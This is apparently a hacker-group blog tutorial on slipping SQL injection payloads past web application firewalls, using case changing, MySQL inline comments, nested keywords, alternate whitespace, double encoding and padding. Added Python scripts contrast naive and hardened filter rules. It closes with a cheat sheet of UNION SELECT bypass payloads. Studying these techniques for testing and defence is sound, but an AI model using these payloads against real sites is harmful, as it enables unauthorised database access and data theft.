WAF BYPASSING IN SQL INJECTIONS

18:52 ---

Hello readers!

Today I share a tutorial on

WAF Bypassing In SQL Injections

What is a WAF?
WAF stands for Web Application Firewall. It is
widely deployed in front of web applications to detect
and block attacks such as SQL injection and Cross Site
Scripting (XSS), usually by matching request parameters
against a set of signatures or rules.

How does it work?
When the WAF decides that input from the end user is
malicious, it drops the request and usually answers with
403 Forbidden, 406 Not Acceptable or some kind of custom
error page.

How to bypass it?

The WAF blocks our payload, so we can't go further
with the injection, right?

Well, it's time to use various techniques to get past it.
The WAF only sees the raw request, while the database
sees the query after its own parsing, and every technique
below exploits a gap between those two views.
Some of these techniques are
described below:

# Case Changing

Some WAF rules only match keywords in lowercase (or
only in uppercase). Since SQL keywords are case-insensitive,
we can easily evade such rules by changing the case.

If union select is forbidden, we can always try
UNION SELECT instead. If both are blocked, we can try
our luck with a mixture of both, like UniOn seLeCt.

# Using Comments

This is the best-known method of bypassing a WAF.

SQL comments help us in many cases: they cut off the
rest of the original query, and placing them between
tokens breaks up the exact strings a WAF rule looks for.
The common comment sequences are

// , -- , --+ , #, -- -

In MySQL, -- must be followed by a whitespace character,
which is why --+ and -- - are used (the + decodes to a
space). // is not a comment in MySQL even though it shows
up in many payload lists, so don't count on it.

# Inline Comments

Some WAFs filter keyword pairs with a rule like

/union\sselect/ig

We can bypass such filters most of the time with MySQL
inline (conditional) comments, /*! ... */, because MySQL
executes the text inside them while the rule only sees
comment markers:

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--

This trick is MySQL-specific: other database engines treat
/*! ... */ as an ordinary comment and drop the keyword,
which breaks the query instead of hiding it.

Read the SQL errors carefully. Sometimes an error leaks
enough to give an idea of how the WAF is working on this
site. Also, filtering union select does not mean the WAF
filters only that pair. It may be filtering other SQL
keywords like table_name, column_name and
information_schema as well, so we might need to apply
inline comments to those keywords too.

Example

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords

Some WAFs sanitise instead of block: they remove the
matched keyword from the input and pass the rest of the
query on to the application, which executes it and throws
errors. If the removal is done in a single pass, we can
nest each keyword inside itself so that what remains after
the filter is the keyword again:

http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--

The filter strips the inner union and select, and the
outer fragments join up into UNION SELECT.

Anyway, it totally depends on the scenario.
I'm just giving the general idea; how you use it is up
to you.
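As an added example, not code from the original post, here is a toy WAF with the three weaknesses the Case Changing, Inline Comments and Double use of Keywords sections exploit (case-sensitive matching, blindness to MySQL /*! */ comments, single-pass keyword stripping), next to a hardened version that normalises before matching and strips to a fixed point. The payloads and rule patterns are constructed for the demonstration and do not come from any real WAF.

```python
import re

# Added example, not code from the original post: a toy WAF with the three
# weaknesses this tutorial exploits (case-sensitive matching, blindness to
# MySQL /*! */ comments, single-pass keyword stripping) beside a hardened
# version. All payloads and rules here are constructed for the demonstration.

KEYWORDS = ("union", "select")


# ---- the naive rules -----------------------------------------------------

def naive_blocks(payload):
    """Lowercase-only literal rule: misses UniOn seLeCt and /*!union*/."""
    return re.search(r"union\s+select", payload) is not None


def naive_strip(payload):
    """Sanitising WAF: delete each keyword in a single pass.
    UNunionION SELselectECT comes out as UNION SELECT."""
    for kw in KEYWORDS:
        payload = re.sub(kw, "", payload, flags=re.I)
    return payload


# ---- the hardened rules --------------------------------------------------

def unwrap_comments(payload):
    """MySQL executes the body of /*! ... */ and /*!50000 ... */, so the rule
    must see that body; ordinary /* ... */ comments are plain whitespace."""
    payload = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", payload, flags=re.S)
    return re.sub(r"/\*.*?\*/", " ", payload, flags=re.S)


def hardened_blocks(payload):
    """Normalise (unwrap comments) and match case-insensitively."""
    rule = r"union\s+(?:all\s+|distinct\s*(?:row)?\s+)?select"
    return re.search(rule, unwrap_comments(payload), re.I) is not None


def hardened_strip(payload):
    """Strip to a fixed point so fragments that re-assemble into a keyword
    after one pass are removed on the next (blocking is still the better
    choice; stripping is shown because the tutorial targets it)."""
    while True:
        stripped = naive_strip(payload)
        if stripped == payload:
            return stripped
        payload = stripped


# ---- the mutations from the tutorial -------------------------------------

def alternate_case(s):
    """UniOn seLeCt style: upper-case every second character."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(s))


def inline_comment(s, version=""):
    """Wrap every token in a MySQL conditional comment, e.g. /*!50000union*/."""
    return " ".join("/*!%s%s*/" % (version, w) for w in s.split())


def double_keyword(word):
    """UNunionION: the keyword nested inside an upper-case copy of itself."""
    half = len(word) // 2
    return word[:half].upper() + word + word[half:].upper()


if __name__ == "__main__":
    for p in ("1 union select 1,2,3",
              "1 " + alternate_case("union select") + " 1,2,3",
              "1 " + inline_comment("union select", "50000") + " 1,2,3"):
        print("%-45s naive=%s hardened=%s" % (p, naive_blocks(p), hardened_blocks(p)))
    doubled = double_keyword("union") + " " + double_keyword("select") + " 1,2,3"
    print(repr(naive_strip(doubled)), "->", repr(hardened_strip(doubled)))
```

The naive rule passes the mixed-case and commented payloads; the hardened rule catches them because it looks at what the MySQL parser will execute rather than at the raw bytes. The single-pass stripper turns UNunionION SELselectECT into a clean UNION SELECT, while the fixed-point stripper leaves nothing but the column list.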

# Using Different Types of Whitespace

Sometimes the WAF rule keys on the whitespace we use
between keywords. We mostly use spaces, sent as + or %20,
but the space is not the only whitespace the database
accepts as a separator. We have some other options as well,
for example

%09 (tab), %0A (line feed), %0B (vertical tab),
%0C (form feed), %0D (carriage return),
%A0 (non-breaking space, MySQL)

A rule written as union\sselect may or may not cover these
depending on the regex engine (\s does not match %A0 unless
Unicode matching is enabled), and a rule written with a
literal space covers none of them. Example:

union%0Bselect%0B1,2,3--
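As an added example (not from the original post), the script below runs the union%0Bselect payload with each separator byte MySQL accepts against three constructed WAF rules: one that only knows the literal space, one written with \s on raw bytes, and one that spells out the parser's whitespace set. The rules and payload are assumptions made for the demonstration.

```python
import re
from urllib.parse import quote_from_bytes

# Added example, not code from the original post: which whitespace bytes a
# MySQL parser accepts as a separator, and which of them a WAF rule written
# with \s actually catches. The payload and the rules are constructed.

# Bytes MySQL treats as whitespace between tokens: tab, LF, VT, FF, CR,
# non-breaking space (0xA0 in latin1) and the ordinary space.
MYSQL_WHITESPACE = [b"\x09", b"\x0a", b"\x0b", b"\x0c", b"\x0d", b"\xa0", b"\x20"]

# Rule 1: only knows the literal space.
SPACE_ONLY_RULE = re.compile(rb"union select", re.I)
# Rule 2: \s on a bytes pattern is ASCII-only ([ \t\n\r\f\v]), so 0xA0 slips
# through. PCRE's \s behaves the same unless Unicode properties are enabled.
ASCII_WS_RULE = re.compile(rb"union\s+select", re.I)
# Rule 3: spells out the parser's whitespace set explicitly.
FULL_WS_RULE = re.compile(rb"union[\x09-\x0d\x20\xa0]+select", re.I)


def payload_with(ws):
    """The tutorial's union%0Bselect%0B1,2,3-- with a chosen separator byte."""
    return b"1" + ws + b"union" + ws + b"select" + ws + b"1,2,3--"


def survivors(rule):
    """Separator bytes whose payload the rule fails to match."""
    return [ws for ws in MYSQL_WHITESPACE if rule.search(payload_with(ws)) is None]


def url_encoded(ws):
    """How the payload looks on the wire (what you paste into the URL)."""
    return quote_from_bytes(payload_with(ws), safe="")


if __name__ == "__main__":
    for name, rule in (("space only", SPACE_ONLY_RULE),
                       ("ASCII \\s", ASCII_WS_RULE),
                       ("full set", FULL_WS_RULE)):
        print(name, "misses:", [url_encoded(ws) for ws in survivors(rule)])
```

The space-only rule misses every alternative separator, the \s rule still misses %A0, and only the rule that lists the database's own whitespace set catches all seven. The same gap exists for a WAF that normalises whitespace before matching but normalises a smaller set than the parser accepts.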

# Encoding

We can always try our luck with URL encoding to bypass
the WAF. For example we can send

union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()

as

union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29

Most WAFs decode the request once before matching, so
plain URL encoding alone rarely helps, and sometimes the
WAF also filters the % character itself. In that case we
can try double URL encoding, where the % of every encoded
byte is itself encoded as %25:

union%2520select%25201,%252f%252a%2521table_name%252a%252f,3%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

This only works when the application decodes the
parameter a second time (for example the framework
decodes it once and the code calls urldecode() again).
A WAF that decodes once sees %20 instead of a space and
lets the request through, but if the application also
decodes only once, the database receives the literal %20
text and the injection fails.
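As an added example, not code from the original post, the script below takes the single- and double-encoded payloads from this section and runs them past a WAF that decodes once, a WAF that decodes to a fixed point, and an application that decodes the parameter once or twice. The query strings and rule are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Added example, not code from the original post: the single- and
# double-URL-encoded payloads from the text, run against a WAF that decodes
# once, a WAF that decodes to a fixed point, and applications that decode the
# parameter once or twice. Query strings are constructed for the demonstration.

RULE = re.compile(r"union\s+select|/\*!", re.I)

SINGLE = "id=1%20union%20select%201,%2f%2a%21table_name%2a%2f,3"
DOUBLE = "id=1%2520union%2520select%25201,%252f%252a%2521table_name%252a%252f,3"


def decode_fixpoint(value, limit=5):
    """Decode until the value stops changing (bounded, so %25%25%25... cannot
    keep the WAF busy). This also decodes legitimate literal '%25' input,
    which is the price of closing the double-encoding gap."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def waf_decode_once(raw_query):
    """WAF that URL-decodes one time, then applies its rule."""
    return RULE.search(unquote(raw_query)) is not None


def waf_decode_fixpoint(raw_query):
    """Hardened WAF: the rule runs on the fully decoded value."""
    return RULE.search(decode_fixpoint(raw_query)) is not None


def app_sees(raw_query, decode_passes):
    """What reaches the SQL layer after the given number of decode passes
    (1 = a normal web framework; 2 = framework plus an explicit urldecode())."""
    value = raw_query
    for _ in range(decode_passes):
        value = unquote(value)
    return value


if __name__ == "__main__":
    for label, q in (("single", SINGLE), ("double", DOUBLE)):
        print(label, "once:", waf_decode_once(q), "fixpoint:", waf_decode_fixpoint(q))
        print("  app(1):", app_sees(q, 1))
        print("  app(2):", app_sees(q, 2))
```

The decode-once WAF lets the double-encoded query through, but an application that decodes once hands the database the literal %20 text, so nothing is injected; only the double-decoding application produces the real UNION SELECT. A WAF that decodes to a fixed point blocks both forms.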

# Unexpected Input

In rare cases we have to give the WAF an unexpected
request to get past its filters: a very long value placed
in front of the real payload. Some WAFs only inspect the
first part of a long parameter, so a keyword placed behind
a large filler is never examined. This is usually called a
"buffer overflow" bypass, although it is an inspection
size limit, not a memory corruption bug.
for example:

http://localhost/waf.php?id=1 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--

The filler is a hex literal, which is valid SQL at any
length; in practice it usually has to be far longer than
shown here to exceed the limit.

This thing only worked once for me. But knowledge
is power; maybe you will face a scenario that can be
bypassed by using buffer overflow.
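As an added example, not code from the original post, the script below models the mechanism behind the trick: a WAF that inspects only the first INSPECT_LIMIT characters of a parameter against one that inspects the whole value. INSPECT_LIMIT = 64 is an assumed number chosen for the demonstration, not a limit taken from any real product; the payload mirrors the one above.

```python
import re

# Added example, not code from the original post. What the tutorial calls a
# "buffer overflow" is a size-limit bypass: a WAF that inspects only the first
# N bytes of a parameter never sees a keyword placed behind a long filler.
# INSPECT_LIMIT = 64 is an assumed value for the demonstration, not taken from
# any real product; the payload mirrors the one in the text.

INSPECT_LIMIT = 64
RULE = re.compile(r"union\s+select", re.I)


def padded_payload(filler_len):
    """A harmless comparison whose right-hand side is a long hex literal,
    followed by the real UNION SELECT."""
    filler = "0x" + "A" * filler_len
    return "1 and (select 1)=(select %s) union select 1,2,3,4,5--" % filler


def truncating_waf_blocks(value):
    """WAF that only inspects the first INSPECT_LIMIT characters."""
    return RULE.search(value[:INSPECT_LIMIT]) is not None


def full_waf_blocks(value):
    """Hardened WAF: inspects the whole value (or rejects over-long input)."""
    return RULE.search(value) is not None


def min_filler_to_evade(max_len=4096):
    """Smallest filler that pushes UNION SELECT past the inspected prefix."""
    for n in range(max_len):
        if not truncating_waf_blocks(padded_payload(n)):
            return n
    return -1


if __name__ == "__main__":
    n = min_filler_to_evade()
    p = padded_payload(n)
    print("filler length %d evades the truncating WAF: %s" % (n, not truncating_waf_blocks(p)))
    print("the full-inspection WAF still blocks it:", full_waf_blocks(p))
```

With the assumed 64-character window, 24 filler characters are enough to push the keyword out of sight; with a real product the window is much larger and the filler has to grow to match. The defender's fix is either to inspect the whole parameter or to reject values longer than the inspection window outright.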

# Use all the above techniques together

Oh!!! ... tried all those things but it is still showing
NOT ACCEPTABLE or FORBIDDEN?

Well, it's
time to combine the techniques
above.

For example, you can use alternate case together with
inline comments, unusual whitespace or URL encoding, so
that no single rule sees the pattern it expects.

# Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
uNiOn aLl sElEcT

Most of these rely on MySQL behaviour (/*!50000 ... */
conditional comments, # line comments, %A0 as whitespace),
and not every entry works on every version. Test each one
against a local copy of the target database first, so that
a failed attempt means a WAF block and not a syntax error.

I hope you have enjoyed this article.
Next time we will share some more tutorials on WAF bypassing.

Please
give us your feedback, so that we can
make things clearer for you next time.

#Indian_Elite_Hackers
